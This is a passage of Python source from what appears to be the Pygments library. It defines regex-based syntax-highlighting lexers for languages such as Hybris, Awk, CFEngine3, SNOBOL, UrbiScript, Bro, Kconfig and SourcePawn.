r'fixed32|fixed64|sfixed32|sfixed64|' r'float|double|bool|string|bytes)\b', Keyword.Type), (r'(true|false)\b', Keyword.Constant), (r'(package)(\s+)', bygroups(Keyword.Namespace, Text), 'package'), (r'(message|extend)(\s+)', bygroups(Keyword.Declaration, Text), 'message'), (r'(enum|group|service)(\s+)', bygroups(Keyword.Declaration, Text), 'type'), (r'\".*\"', String), (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float), (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float), (r'(\-?(inf|nan))', Number.Float), (r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex), (r'0[0-7]+[LlUu]*', Number.Oct), (r'\d+[LlUu]*', Number.Integer), 
(r'[+-=]', Operator), (r'([a-zA-Z_][a-zA-Z0-9_\.]*)([ \t]*)(=)', bygroups(Name.Attribute, Text, Operator)), ('[a-zA-Z_][a-zA-Z0-9_\.]*', Name), ], 'package': [ (r'[a-zA-Z_][a-zA-Z0-9_]*', Name.Namespace, '#pop') ], 'message': [ (r'[a-zA-Z_][a-zA-Z0-9_]*', Name.Class, '#pop') ], 'type': [ (r'[a-zA-Z_][a-zA-Z0-9_]*', Name, '#pop') ], } class HybrisLexer(RegexLexer): """ For `Hybris <http://www.hybris-lang.org>`_ source code. *New in Pygments 1.4.* """ name = 'Hybris' aliases = ['hybris', 'hy'] filenames = ['*.hy', '*.hyb'] mimetypes = ['text/x-hybris', 'application/x-hybris'] flags = re.MULTILINE | re.DOTALL tokens = { 'root': [ # method names (r'^(\s*(?:function|method|operator\s+)+?)' r'([a-zA-Z_][a-zA-Z0-9_]*)' r'(\s*)(\()', bygroups(Keyword, Name.Function, Text, Operator)), (r'[^\S\n]+', Text), (r'//.*?\n', Comment.Single), (r'/\*.*?\*/', Comment.Multiline), (r'@[a-zA-Z_][a-zA-Z0-9_\.]*', Name.Decorator), (r'(break|case|catch|next|default|do|else|finally|for|foreach|of|' r'unless|if|new|return|switch|me|throw|try|while)\b', Keyword), (r'(extends|private|protected|public|static|throws|function|method|' r'operator)\b', Keyword.Declaration), (r'(true|false|null|__FILE__|__LINE__|__VERSION__|__LIB_PATH__|' r'__INC_PATH__)\b', Keyword.Constant), (r'(class|struct)(\s+)', bygroups(Keyword.Declaration, Text), 'class'), (r'(import|include)(\s+)', bygroups(Keyword.Namespace, Text), 'import'), (r'(gc_collect|gc_mm_items|gc_mm_usage|gc_collect_threshold|' r'urlencode|urldecode|base64encode|base64decode|sha1|crc32|sha2|' r'md5|md5_file|acos|asin|atan|atan2|ceil|cos|cosh|exp|fabs|floor|' r'fmod|log|log10|pow|sin|sinh|sqrt|tan|tanh|isint|isfloat|ischar|' r'isstring|isarray|ismap|isalias|typeof|sizeof|toint|tostring|' r'fromxml|toxml|binary|pack|load|eval|var_names|var_values|' r'user_functions|dyn_functions|methods|call|call_method|mknod|' r'mkfifo|mount|umount2|umount|ticks|usleep|sleep|time|strtime|' r'strdate|dllopen|dlllink|dllcall|dllcall_argv|dllclose|env|exec|' 
r'fork|getpid|wait|popen|pclose|exit|kill|pthread_create|' r'pthread_create_argv|pthread_exit|pthread_join|pthread_kill|' r'smtp_send|http_get|http_post|http_download|socket|bind|listen|' r'accept|getsockname|getpeername|settimeout|connect|server|recv|' r'send|close|print|println|printf|input|readline|serial_open|' r'serial_fcntl|serial_get_attr|serial_get_ispeed|serial_get_ospeed|' r'serial_set_attr|serial_set_ispeed|serial_set_ospeed|serial_write|' r'serial_read|serial_close|xml_load|xml_parse|fopen|fseek|ftell|' r'fsize|fread|fwrite|fgets|fclose|file|readdir|pcre_replace|size|' r'pop|unmap|has|keys|values|length|find|substr|replace|split|trim|' r'remove|contains|join)\b', Name.Builtin), (r'(MethodReference|Runner|Dll|Thread|Pipe|Process|Runnable|' r'CGI|ClientSocket|Socket|ServerSocket|File|Console|Directory|' r'Exception)\b', Keyword.Type), (r'"(\\\\|\\"|[^"])*"', String), (r"'\\.'|'[^\\]'|'\\u[0-9a-f]{4}'", String.Char), (r'(\.)([a-zA-Z_][a-zA-Z0-9_]*)', bygroups(Operator, Name.Attribute)), (r'[a-zA-Z_][a-zA-Z0-9_]*:', Name.Label), (r'[a-zA-Z_\$][a-zA-Z0-9_]*', Name), (r'[~\^\*!%&\[\]\(\)\{\}<>\|+=:;,./?\-@]+', Operator), (r'[0-9][0-9]*\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float), (r'0x[0-9a-f]+', Number.Hex), (r'[0-9]+L?', Number.Integer), (r'\n', Text), ], 'class': [ (r'[a-zA-Z_][a-zA-Z0-9_]*', Name.Class, '#pop') ], 'import': [ (r'[a-zA-Z0-9_.]+\*?', Name.Namespace, '#pop') ], } class AwkLexer(RegexLexer): """ For Awk scripts. 
*New in Pygments 1.5.* """ name = 'Awk' aliases = ['awk', 'gawk', 'mawk', 'nawk'] filenames = ['*.awk'] mimetypes = ['application/x-awk'] tokens = { 'commentsandwhitespace': [ (r'\s+', Text), (r'#.*$', Comment.Single) ], 'slashstartsregex': [ include('commentsandwhitespace'), (r'/(\\.|[^[/\\\n]|\[(\\.|[^\]\\\n])*])+/' r'\B', String.Regex, '#pop'), (r'(?=/)', Text, ('#pop', 'badregex')), (r'', Text, '#pop') ], 'badregex': [ (r'\n', Text, '#pop') ], 'root': [ (r'^(?=\s|/)', Text, 'slashstartsregex'), include('commentsandwhitespace'), (r'\+\+|--|\|\||&&|in|\$|!?~|' r'(\*\*|[-<>+*%\^/!=])=?', Operator, 'slashstartsregex'), (r'[{(\[;,]', Punctuation, 'slashstartsregex'), (r'[})\].]', Punctuation), (r'(break|continue|do|while|exit|for|if|' r'return)\b', Keyword, 'slashstartsregex'), (r'function\b', Keyword.Declaration, 'slashstartsregex'), (r'(atan2|cos|exp|int|log|rand|sin|sqrt|srand|gensub|gsub|index|' r'length|match|split|sprintf|sub|substr|tolower|toupper|close|' r'fflush|getline|next|nextfile|print|printf|strftime|systime|' r'delete|system)\b', Keyword.Reserved), (r'(ARGC|ARGIND|ARGV|CONVFMT|ENVIRON|ERRNO|FIELDWIDTHS|FILENAME|FNR|FS|' r'IGNORECASE|NF|NR|OFMT|OFS|ORFS|RLENGTH|RS|RSTART|RT|' r'SUBSEP)\b', Name.Builtin), (r'[$a-zA-Z_][a-zA-Z0-9_]*', Name.Other), (r'[0-9][0-9]*\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float), (r'0x[0-9a-fA-F]+', Number.Hex), (r'[0-9]+', Number.Integer), (r'"(\\\\|\\"|[^"])*"', String.Double), (r"'(\\\\|\\'|[^'])*'", String.Single), ] } class Cfengine3Lexer(RegexLexer): """ Lexer for `CFEngine3 <http://cfengine.org>`_ policy files. 
*New in Pygments 1.5.* """ name = 'CFEngine3' aliases = ['cfengine3', 'cf3'] filenames = ['*.cf'] mimetypes = [] tokens = { 'root': [ (r'#.*?\n', Comment), (r'(body)(\s+)(\S+)(\s+)(control)', bygroups(Keyword, Text, Keyword, Text, Keyword)), (r'(body|bundle)(\s+)(\S+)(\s+)(\w+)(\()', bygroups(Keyword, Text, Keyword, Text, Name.Function, Punctuation), 'arglist'), (r'(body|bundle)(\s+)(\S+)(\s+)(\w+)', bygroups(Keyword, Text, Keyword, Text, Name.Function)), (r'(")([^"]+)(")(\s+)(string|slist|int|real)(\s*)(=>)(\s*)', bygroups(Punctuation,Name.Variable,Punctuation, Text,Keyword.Type,Text,Operator,Text)), (r'(\S+)(\s*)(=>)(\s*)', bygroups(Keyword.Reserved,Text,Operator,Text)), (r'"', String, 'string'), (r'(\w+)(\()', bygroups(Name.Function, Punctuation)), (r'([\w.!&|\(\)]+)(::)', bygroups(Name.Class, Punctuation)), (r'(\w+)(:)', bygroups(Keyword.Declaration,Punctuation)), (r'@[\{\(][^\)\}]+[\}\)]', Name.Variable), (r'[(){},;]', Punctuation), (r'=>', Operator), (r'->', Operator), (r'\d+\.\d+', Number.Float), (r'\d+', Number.Integer), (r'\w+', Name.Function), (r'\s+', Text), ], 'string': [ (r'\$[\{\(]', String.Interpol, 'interpol'), (r'\\.', String.Escape), (r'"', String, '#pop'), (r'\n', String), (r'.', String), ], 'interpol': [ (r'\$[\{\(]', String.Interpol, '#push'), (r'[\}\)]', String.Interpol, '#pop'), (r'[^\$\{\(\)\}]+', String.Interpol), ], 'arglist': [ (r'\)', Punctuation, '#pop'), (r',', Punctuation), (r'\w+', Name.Variable), (r'\s+', Text), ], } class SnobolLexer(RegexLexer): """ Lexer for the SNOBOL4 programming language. Recognizes the common ASCII equivalents of the original SNOBOL4 operators. Does not require spaces around binary operators. *New in Pygments 1.5.* """ name = "Snobol" aliases = ["snobol"] filenames = ['*.snobol'] mimetypes = ['text/x-snobol'] tokens = { # root state, start of line # comments, continuation lines, and directives start in column 1 # as do labels 'root': [ (r'\*.*\n', Comment), (r'[\+\.] 
', Punctuation, 'statement'), (r'-.*\n', Comment), (r'END\s*\n', Name.Label, 'heredoc'), (r'[A-Za-z\$][\w$]*', Name.Label, 'statement'), (r'\s+', Text, 'statement'), ], # statement state, line after continuation or label 'statement': [ (r'\s*\n', Text, '#pop'), (r'\s+', Text), (r'(?<=[^\w.])(LT|LE|EQ|NE|GE|GT|INTEGER|IDENT|DIFFER|LGT|SIZE|' r'REPLACE|TRIM|DUPL|REMDR|DATE|TIME|EVAL|APPLY|OPSYN|LOAD|UNLOAD|' r'LEN|SPAN|BREAK|ANY|NOTANY|TAB|RTAB|REM|POS|RPOS|FAIL|FENCE|' r'ABORT|ARB|ARBNO|BAL|SUCCEED|INPUT|OUTPUT|TERMINAL)(?=[^\w.])', Name.Builtin), (r'[A-Za-z][\w\.]*', Name), # ASCII equivalents of original operators # | for the EBCDIC equivalent, ! likewise # \ for EBCDIC negation (r'\*\*|[\?\$\.!%\*/#+\-@\|&\\=]', Operator), (r'"[^"]*"', String), (r"'[^']*'", String), # Accept SPITBOL syntax for real numbers # as well as Macro SNOBOL4 (r'[0-9]+(?=[^\.EeDd])', Number.Integer), (r'[0-9]+(\.[0-9]*)?([EDed][-+]?[0-9]+)?', Number.Float), # Goto (r':', Punctuation, 'goto'), (r'[\(\)<>,;]', Punctuation), ], # Goto block 'goto': [ (r'\s*\n', Text, "#pop:2"), (r'\s+', Text), (r'F|S', Keyword), (r'(\()([A-Za-z][\w.]*)(\))', bygroups(Punctuation, Name.Label, Punctuation)) ], # everything after the END statement is basically one # big heredoc. 'heredoc': [ (r'.*\n', String.Heredoc) ] } class UrbiscriptLexer(ExtendedRegexLexer): """ For UrbiScript source code. 
*New in Pygments 1.5.* """ name = 'UrbiScript' aliases = ['urbiscript'] filenames = ['*.u'] mimetypes = ['application/x-urbiscript'] flags = re.DOTALL ## TODO # - handle Experimental and deprecated tags with specific tokens # - handle Angles and Durations with specific tokens def blob_callback(lexer, match, ctx): text_before_blob = match.group(1) blob_start = match.group(2) blob_size_str = match.group(3) blob_size = int(blob_size_str) yield match.start(), String, text_before_blob ctx.pos += len(text_before_blob) # if blob size doesn't match blob format (example : "\B(2)(aaa)") # yield blob as a string if ctx.text[match.end() + blob_size] != ")": result = "\\B(" + blob_size_str + ")(" yield match.start(), String, result ctx.pos += len(result) return # if blob is well formated, yield as Escape blob_text = blob_start + ctx.text[match.end():match.end()+blob_size] + ")" yield match.start(), String.Escape, blob_text ctx.pos = match.end() + blob_size + 1 # +1 is the ending ")" tokens = { 'root': [ (r'\s+', Text), # comments (r'//.*?\n', Comment), (r'/\*', Comment.Multiline, 'comment'), (r'(?:every|for|loop|while)(?:;|&|\||,)',Keyword), (r'(?:assert|at|break|case|catch|closure|compl|continue|' r'default|else|enum|every|external|finally|for|freezeif|if|new|' r'onleave|return|stopif|switch|this|throw|timeout|try|' r'waituntil|whenever|while)\b', Keyword), (r'(?:asm|auto|bool|char|const_cast|delete|double|dynamic_cast|' r'explicit|export|extern|float|friend|goto|inline|int|' r'long|mutable|namespace|register|reinterpret_cast|short|' r'signed|sizeof|static_cast|struct|template|typedef|typeid|' r'typename|union|unsigned|using|virtual|volatile|' r'wchar_t)\b', Keyword.Reserved), # deprecated keywords, use a meaningfull token when available (r'(?:emit|foreach|internal|loopn|static)\b', Keyword), # ignored keywords, use a meaningfull token when available (r'(?:private|protected|public)\b', Keyword), (r'(?:var|do|const|function|class)\b', Keyword.Declaration), 
(r'(?:true|false|nil|void)\b', Keyword.Constant), (r'(?:Barrier|Binary|Boolean|CallMessage|Channel|Code|' r'Comparable|Container|Control|Date|Dictionary|Directory|' r'Duration|Enumeration|Event|Exception|Executable|File|Finalizable|' r'Float|FormatInfo|Formatter|Global|Group|Hash|InputStream|' r'IoService|Job|Kernel|Lazy|List|Loadable|Lobby|Location|Logger|Math|' r'Mutex|nil|Object|Orderable|OutputStream|Pair|Path|Pattern|Position|' r'Primitive|Process|Profile|PseudoLazy|PubSub|RangeIterable|Regexp|' r'Semaphore|Server|Singleton|Socket|StackFrame|Stream|String|System|' r'Tag|Timeout|Traceable|TrajectoryGenerator|Triplet|Tuple' r'|UObject|UValue|UVar)\b', Name.Builtin), (r'(?:this)\b', Name.Builtin.Pseudo), # don't match single | and & (r'(?:[-=+*%/<>~^:]+|\.&?|\|\||&&)', Operator), (r'(?:and_eq|and|bitand|bitor|in|not|not_eq|or_eq|or|xor_eq|xor)\b', Operator.Word), (r'[{}\[\]()]+', Punctuation), (r'(?:;|\||,|&|\?|!)+', Punctuation), (r'[$a-zA-Z_][a-zA-Z0-9_]*', Name.Other), (r'0x[0-9a-fA-F]+', Number.Hex), # Float, Integer, Angle and Duration (r'(?:[0-9]+(?:(?:\.[0-9]+)?(?:[eE][+-]?[0-9]+)?)?' r'((?:rad|deg|grad)|(?:ms|s|min|h|d))?)\b', Number.Float), # handle binary blob in strings (r'"', String.Double, "string.double"), (r"'", String.Single, "string.single"), ], 'string.double': [ (r'((?:\\\\|\\"|[^"])*?)(\\B\((\d+)\)\()', blob_callback), (r'(\\\\|\\"|[^"])*?"', String.Double, '#pop'), ], 'string.single': [ (r"((?:\\\\|\\'|[^'])*?)(\\B\((\d+)\)\()", blob_callback), (r"(\\\\|\\'|[^'])*?'", String.Single, '#pop'), ], # from http://pygments.org/docs/lexerdevelopment/#changing-states 'comment': [ (r'[^*/]', Comment.Multiline), (r'/\*', Comment.Multiline, '#push'), (r'\*/', Comment.Multiline, '#pop'), (r'[*/]', Comment.Multiline), ] } class OpenEdgeLexer(RegexLexer): """ Lexer for `OpenEdge ABL (formerly Progress) <http://web.progress.com/en/openedge/abl.html>`_ source code. 
    *New in Pygments 1.5.*
    """
    name = 'OpenEdge ABL'
    aliases = ['openedge', 'abl', 'progress']
    filenames = ['*.p', '*.cls']
    mimetypes = ['text/x-openedge', 'application/x-openedge']

    # Built-in data types, including the abbreviated forms ABL accepts
    # (CHAR, CHARA, ... for CHARACTER), matched case-insensitively and only
    # when delimited by non-identifier characters.
    types = (r'(?i)(^|(?<=[^0-9a-z_\-]))(CHARACTER|CHAR|CHARA|CHARAC|CHARACT|CHARACTE|'
             r'COM-HANDLE|DATE|DATETIME|DATETIME-TZ|'
             r'DECIMAL|DEC|DECI|DECIM|DECIMA|HANDLE|'
             r'INT64|INTEGER|INT|INTE|INTEG|INTEGE|'
             r'LOGICAL|LONGCHAR|MEMPTR|RAW|RECID|ROWID)\s*($|(?=[^0-9a-z_\-]))')

    # Keyword alternation built from OPENEDGEKEYWORDS, a word list defined
    # elsewhere in this module (imported at file level).
    keywords = (r'(?i)(^|(?<=[^0-9a-z_\-]))(' +
                r'|'.join(OPENEDGEKEYWORDS) +
                r')\s*($|(?=[^0-9a-z_\-]))')

    tokens = {
        'root': [
            (r'/\*', Comment.Multiline, 'comment'),
            (r'\{', Comment.Preproc, 'preprocessor'),
            (r'\s*&.*', Comment.Preproc),
            (r'0[xX][0-9a-fA-F]+[LlUu]*', Number.Hex),
            (r'(?i)(DEFINE|DEF|DEFI|DEFIN)\b', Keyword.Declaration),
            (types, Keyword.Type),
            (keywords, Name.Builtin),
            (r'"(\\\\|\\"|[^"])*"', String.Double),
            (r"'(\\\\|\\'|[^'])*'", String.Single),
            (r'[0-9][0-9]*\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float),
            (r'[0-9]+', Number.Integer),
            (r'\s+', Text),
            (r'[+*/=-]', Operator),
            (r'[.:()]', Punctuation),
            (r'.', Name.Variable), # Lazy catch-all
        ],
        'comment': [
            (r'[^*/]', Comment.Multiline),
            (r'/\*', Comment.Multiline, '#push'),
            (r'\*/', Comment.Multiline, '#pop'),
            (r'[*/]', Comment.Multiline)
        ],
        'preprocessor': [
            (r'[^{}]', Comment.Preproc),
            (r'{', Comment.Preproc, '#push'),
            (r'}', Comment.Preproc, '#pop'),
        ],
    }


class BroLexer(RegexLexer):
    """
    For `Bro <http://bro-ids.org/>`_ scripts.

    *New in Pygments 1.5.*
    """
    name = 'Bro'
    aliases = ['bro']
    filenames = ['*.bro']

    # Reusable regex fragments composed into the rules below.
    _hex = r'[0-9a-fA-F_]+'
    _float = r'((\d*\.?\d+)|(\d+\.?\d*))([eE][-+]?\d+)?'
    _h = r'[A-Za-z0-9][-A-Za-z0-9]*'

    tokens = {
        'root': [
            # Whitespace
            (r'^@.*?\n', Comment.Preproc),
            (r'#.*?\n', Comment.Single),
            (r'\n', Text),
            (r'\s+', Text),
            (r'\\\n', Text),
            # Keywords
            (r'(add|alarm|break|case|const|continue|delete|do|else|enum|event'
             r'|export|for|function|if|global|hook|local|module|next'
             r'|of|print|redef|return|schedule|switch|type|when|while)\b',
             Keyword),
            (r'(addr|any|bool|count|counter|double|file|int|interval|net'
             r'|pattern|port|record|set|string|subnet|table|time|timer'
             r'|vector)\b', Keyword.Type),
            (r'(T|F)\b', Keyword.Constant),
            (r'(&)((?:add|delete|expire)_func|attr|(?:create|read|write)_expire'
             r'|default|disable_print_hook|raw_output|encrypt|group|log'
             r'|mergeable|optional|persistent|priority|redef'
             r'|rotate_(?:interval|size)|synchronized)\b',
             bygroups(Punctuation, Keyword)),
            (r'\s+module\b', Keyword.Namespace),
            # Addresses, ports and networks
            (r'\d+/(tcp|udp|icmp|unknown)\b', Number),
            (r'(\d+\.){3}\d+', Number),
            (r'(' + _hex + r'){7}' + _hex, Number),
            (r'0x' + _hex + r'(' + _hex + r'|:)*::(' + _hex + r'|:)*', Number),
            (r'((\d+|:)(' + _hex + r'|:)*)?::(' + _hex + r'|:)*', Number),
            (r'(\d+\.\d+\.|(\d+\.){2}\d+)', Number),
            # Hostnames
            (_h + r'(\.' + _h + r')+', String),
            # Numeric
            (_float + r'\s+(day|hr|min|sec|msec|usec)s?\b', Literal.Date),
            (r'0[xX]' + _hex, Number.Hex),
            (_float, Number.Float),
            (r'\d+', Number.Integer),
            (r'/', String.Regex, 'regex'),
            (r'"', String, 'string'),
            # Operators
            (r'[!%*/+:<=>?~|-]', Operator),
            (r'([-+=&|]{2}|[+=!><-]=)', Operator),
            (r'(in|match)\b', Operator.Word),
            (r'[{}()\[\]$.,;]', Punctuation),
            # Identifier
            (r'([_a-zA-Z]\w*)(::)', bygroups(Name, Name.Namespace)),
            (r'[a-zA-Z_][a-zA-Z_0-9]*', Name)
        ],
        'string': [
            (r'"', String, '#pop'),
            (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape),
            (r'[^\\"\n]+', String),
            (r'\\\n', String),
            (r'\\', String)
        ],
        'regex': [
            (r'/', String.Regex, '#pop'),
            (r'\\[\\nt/]', String.Regex), # String.Escape is too intense here.
            (r'[^\\/\n]+', String.Regex),
            (r'\\\n', String.Regex),
            (r'\\', String.Regex)
        ]
    }


class CbmBasicV2Lexer(RegexLexer):
    """
    For CBM BASIC V2 sources.

    *New in Pygments 1.6.*
    """
    name = 'CBM BASIC V2'
    aliases = ['cbmbas']
    filenames = ['*.bas']

    # CBM BASIC keywords are case-insensitive.
    flags = re.IGNORECASE

    tokens = {
        'root': [
            (r'rem.*\n', Comment.Single),
            (r'\s+', Text),
            (r'new|run|end|for|to|next|step|go(to|sub)?|on|return|stop|cont'
             r'|if|then|input#?|read|wait|load|save|verify|poke|sys|print#?'
             r'|list|clr|cmd|open|close|get#?', Keyword.Reserved),
            (r'data|restore|dim|let|def|fn', Keyword.Declaration),
            (r'tab|spc|sgn|int|abs|usr|fre|pos|sqr|rnd|log|exp|cos|sin|tan|atn'
             r'|peek|len|val|asc|(str|chr|left|right|mid)\$', Name.Builtin),
            (r'[-+*/^<>=]', Operator),
            (r'not|and|or', Operator.Word),
            (r'"[^"\n]*.', String),
            (r'\d+|[-+]?\d*\.\d*(e[-+]?\d+)?', Number.Float),
            (r'[\(\),:;]', Punctuation),
            (r'\w+[$%]?', Name),
        ]
    }

    def analyse_text(self, text):
        """Claim input that starts with a line number as CBM BASIC."""
        # if it starts with a line number, it shouldn't be a "modern" Basic
        # like VB.net
        if re.match(r'\d+', text):
            return True


class MscgenLexer(RegexLexer):
    """
    For `Mscgen <http://www.mcternan.me.uk/mscgen/>`_ files.
    *New in Pygments 1.6.*
    """
    name = 'Mscgen'
    aliases = ['mscgen', 'msc']
    filenames = ['*.msc']

    # An identifier or a double-quoted string (used for entity names and
    # attribute values).
    _var = r'([a-zA-Z0-9_]+|"(?:\\"|[^"])*")'

    tokens = {
        'root': [
            (r'msc\b', Keyword.Type),
            # Options
            (r'(hscale|HSCALE|width|WIDTH|wordwraparcs|WORDWRAPARCS'
             r'|arcgradient|ARCGRADIENT)\b', Name.Property),
            # Operators
            (r'(abox|ABOX|rbox|RBOX|box|BOX|note|NOTE)\b', Operator.Word),
            (r'(\.|-|\|){3}', Keyword),
            (r'(?:-|=|\.|:){2}'
             r'|<<=>>|<->|<=>|<<>>|<:>'
             r'|->|=>>|>>|=>|:>|-x|-X'
             r'|<-|<<=|<<|<=|<:|x-|X-|=', Operator),
            # Names
            (r'\*', Name.Builtin),
            (_var, Name.Variable),
            # Other
            (r'\[', Punctuation, 'attrs'),
            (r'\{|\}|,|;', Punctuation),
            include('comments')
        ],
        'attrs': [
            (r'\]', Punctuation, '#pop'),
            (_var + r'(\s*)(=)(\s*)' + _var,
             bygroups(Name.Attribute, Text.Whitespace, Operator,
                      Text.Whitespace, String)),
            (r',', Punctuation),
            include('comments')
        ],
        'comments': [
            (r'(?://|#).*?\n', Comment.Single),
            (r'/\*(?:.|\n)*?\*/', Comment.Multiline),
            (r'[ \t\r\n]+', Text.Whitespace)
        ]
    }


def _rx_indent(level):
    """Return a regex matching one line at indentation *level* (for Kconfig)."""
    # Kconfig *always* interprets a tab as 8 spaces, so this is the default.
    # Edit this if you are in an environment where KconfigLexer gets expanded
    # input (tabs expanded to spaces) and the expansion tab width is != 8,
    # e.g. in connection with Trac (trac.ini, [mimeviewer], tab_width).
    # Value range here is 2 <= {tab_width} <= 8.
    tab_width = 8
    # Regex matching a given indentation {level}, assuming that indentation is
    # a multiple of {tab_width}. In other cases there might be problems.
    return r'(?:\t| {1,%s}\t| {%s}){%s}.*\n' % (tab_width-1, tab_width, level)


class KconfigLexer(RegexLexer):
    """
    For Linux-style Kconfig files.
    *New in Pygments 1.6.*
    """

    name = 'Kconfig'
    aliases = ['kconfig', 'menuconfig', 'linux-config', 'kernel-config']
    # Adjust this if new kconfig file names appear in your environment
    filenames = ['Kconfig', '*Config.in*', 'external.in*',
                 'standard-modules.in']
    mimetypes = ['text/x-kconfig']
    # No re.MULTILINE, indentation-aware help text needs line-by-line handling
    flags = 0

    def call_indent(level):
        # If indentation >= {level} is detected, enter state 'indent{level}'
        return (_rx_indent(level), String.Doc, 'indent%s' % level)

    def do_indent(level):
        # Print paragraphs of indentation level >= {level} as String.Doc,
        # ignoring blank lines. Then return to 'root' state.
        return [
            (_rx_indent(level), String.Doc),
            (r'\s*\n', Text),
            (r'', Generic, '#pop:2')
        ]

    tokens = {
        'root': [
            (r'\s+', Text),
            (r'#.*?\n', Comment.Single),
            (r'(mainmenu|config|menuconfig|choice|endchoice|comment|menu|'
             r'endmenu|visible if|if|endif|source|prompt|select|depends on|'
             r'default|range|option)\b', Keyword),
            (r'(---help---|help)[\t ]*\n', Keyword, 'help'),
            (r'(bool|tristate|string|hex|int|defconfig_list|modules|env)\b',
             Name.Builtin),
            (r'[!=&|]', Operator),
            (r'[()]', Punctuation),
            (r'[0-9]+', Number.Integer),
            (r"'(''|[^'])*'", String.Single),
            (r'"(""|[^"])*"', String.Double),
            (r'\S+', Text),
        ],
        # Help text is indented, multi-line and ends when a lower indentation
        # level is detected.
        'help': [
            # Skip blank lines after help token, if any
            (r'\s*\n', Text),
            # Determine the first help line's indentation level heuristically(!).
            # Attention: this is not perfect, but works for 99% of "normal"
            # indentation schemes up to a max. indentation level of 7.
call_indent(7), call_indent(6), call_indent(5), call_indent(4), call_indent(3), call_indent(2), call_indent(1), ('', Text, '#pop'), # for incomplete help sections without text ], # Handle text for indentation levels 7 to 1 'indent7': do_indent(7), 'indent6': do_indent(6), 'indent5': do_indent(5), 'indent4': do_indent(4), 'indent3': do_indent(3), 'indent2': do_indent(2), 'indent1': do_indent(1), } class VGLLexer(RegexLexer): """ For `SampleManager VGL <http://www.thermoscientific.com/samplemanager>`_ source code. *New in Pygments 1.6.* """ name = 'VGL' aliases = ['vgl'] filenames = ['*.rpf'] flags = re.MULTILINE | re.DOTALL | re.IGNORECASE tokens = { 'root': [ (r'\{[^\}]*\}', Comment.Multiline), (r'declare', Keyword.Constant), (r'(if|then|else|endif|while|do|endwhile|and|or|prompt|object' r'|create|on|line|with|global|routine|value|endroutine|constant' r'|global|set|join|library|compile_option|file|exists|create|copy' r'|delete|enable|windows|name|notprotected)(?! *[=<>.,()])', Keyword), (r'(true|false|null|empty|error|locked)', Keyword.Constant), (r'[~\^\*\#!%&\[\]\(\)<>\|+=:;,./?-]', Operator), (r'"[^"]*"', String), (r'(\.)([a-z_\$][a-z0-9_\$]*)', bygroups(Operator, Name.Attribute)), (r'[0-9][0-9]*(\.[0-9]+(e[+\-]?[0-9]+)?)?', Number), (r'[a-z_\$][a-z0-9_\$]*', Name), (r'[\r\n]+', Text), (r'\s+', Text) ] } class SourcePawnLexer(RegexLexer): """ For SourcePawn source code with preprocessor directives. 
    *New in Pygments 1.6.*
    """
    name = 'SourcePawn'
    aliases = ['sp']
    filenames = ['*.sp']
    mimetypes = ['text/x-sourcepawn']

    #: optional Comment or Whitespace
    _ws = r'(?:\s|//.*?\n|/\*.*?\*/)+'

    tokens = {
        'root': [
            # preprocessor directives: without whitespace
            ('^#if\s+0', Comment.Preproc, 'if0'),
            ('^#', Comment.Preproc, 'macro'),
            # or with whitespace
            ('^' + _ws + r'#if\s+0', Comment.Preproc, 'if0'),
            ('^' + _ws + '#', Comment.Preproc, 'macro'),
            (r'\n', Text),
            (r'\s+', Text),
            (r'\\\n', Text), # line continuation
            (r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single),
            (r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline),
            (r'[{}]', Punctuation),
            (r'L?"', String, 'string'),
            (r"L?'(\\.|\\[0-7]{1,3}|\\x[a-fA-F0-9]{1,2}|[^\\\'\n])'",
             String.Char),
            (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float),
            (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float),
            (r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex),
            (r'0[0-7]+[LlUu]*', Number.Oct),
            (r'\d+[LlUu]*', Number.Integer),
            (r'\*/', Error),
            (r'[~!%^&*+=|?:<>/-]', Operator),
            (r'[()\[\],.;]', Punctuation),
            (r'(case|const|continue|native|'
             r'default|else|enum|for|if|new|operator|'
             r'public|return|sizeof|static|decl|struct|switch)\b', Keyword),
            (r'(bool|Float)\b', Keyword.Type),
            (r'(true|false)\b', Keyword.Constant),
            ('[a-zA-Z_][a-zA-Z0-9_]*', Name),
        ],
        'string': [
            (r'"', String, '#pop'),
            (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape),
            (r'[^\\"\n]+', String), # all other characters
            (r'\\\n', String), # line continuation
            (r'\\', String), # stray backslash
        ],
        'macro': [
            (r'[^/\n]+', Comment.Preproc),
            (r'/\*(.|\n)*?\*/', Comment.Multiline),
            (r'//.*?\n', Comment.Single, '#pop'),
            (r'/', Comment.Preproc),
            (r'(?<=\\)\n', Comment.Preproc),
            (r'\n', Comment.Preproc, '#pop'),
        ],
        'if0': [
            (r'^\s*#if.*?(?<!\\)\n', Comment.Preproc, '#push'),
            (r'^\s*#endif.*?(?<!\\)\n', Comment.Preproc, '#pop'),
            (r'.*?\n', Comment),
        ]
    }

    # SourceMod type names; Name tokens matching one of these are re-tagged
    # as Keyword.Type in get_tokens_unprocessed (when 'sourcemod' is enabled).
    SM_TYPES = ['Action', 'bool', 'Float', 'Plugin', 'String', 'any',
                'AdminFlag', 'OverrideType', 'OverrideRule', 'ImmunityType',
                'GroupId', 'AdminId', 'AdmAccessMode', 'AdminCachePart',
                'CookieAccess', 'CookieMenu', 'CookieMenuAction', 'NetFlow',
                'ConVarBounds', 'QueryCookie', 'ReplySource',
                'ConVarQueryResult', 'ConVarQueryFinished', 'Function',
                'Action', 'Identity', 'PluginStatus', 'PluginInfo', 'DBResult',
                'DBBindType', 'DBPriority', 'PropType', 'PropFieldType',
                'MoveType', 'RenderMode', 'RenderFx', 'EventHookMode',
                'EventHook', 'FileType', 'FileTimeMode', 'PathType',
                'ParamType', 'ExecType', 'DialogType', 'Handle', 'KvDataTypes',
                'NominateResult', 'MapChange', 'MenuStyle', 'MenuAction',
